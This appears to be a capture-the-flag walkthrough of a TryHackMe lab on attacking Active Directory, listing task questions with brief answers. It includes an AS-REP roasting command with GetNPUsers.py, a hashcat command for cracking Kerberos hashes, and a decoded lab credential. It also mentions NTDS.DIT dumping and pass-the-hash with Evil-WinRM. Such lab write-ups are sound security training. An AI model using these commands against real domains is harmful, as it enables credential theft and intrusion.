Attacking Active Directory: TryHackMe

[Task2]: Setting up the environment

git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacketpip3 install -r /opt/impacket/requirements.txtcd /opt/impacket/ && python3 ./setup.py install

[Task3]: Network Enumeration

(#1) What tool will allow us to enumerate port 139/445?

(#2) What is the NetBIOS-Domain Name of the machine?

(#3) What invalid TLD do people commonly use for their Active Directory Domain?

[Task4]: Enumerating Users via Kerbrute

(#1)What command within Kerbrute will allow us to enumerate valid usernames?

(#2)What notable account is discovered?

(#3)What is the other notable account is discovered? (These should jump out at you)

[Task5]: Abusing Kerberos(AS-REP Roasting)

(#1)We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

GetNPUsers.py spookysec.local/svc-admin -no-pass
Kerberos 5 AS-REP etype 23

(#3)What mode is the hash?

hashcat -m 18200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt — force

[Task6]: Enumerating SMB

(#1)What utility can we use to map remote SMB shares?

(#2)Which option will list shares?

(#3)How many remote shares is the server listing?

(#4)There is one particular share that we have access to that contains a text file. Which share is it?

(#5)What is the content of the file?

(#6)Decoding the contents of the file, what is the full contents?

backup@spookysec.local:backup2517860

[Task7]: Elevating Privileges within the Domain

(#1)What method allowed us to dump NTDS.DIT?

(#2)What is the Administrators NTLM hash?

(#3)What method of attack could allow us to authenticate as the user without the password?

(#4)Using a tool called Evil-WinRM what option will allow us to use a hash?

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store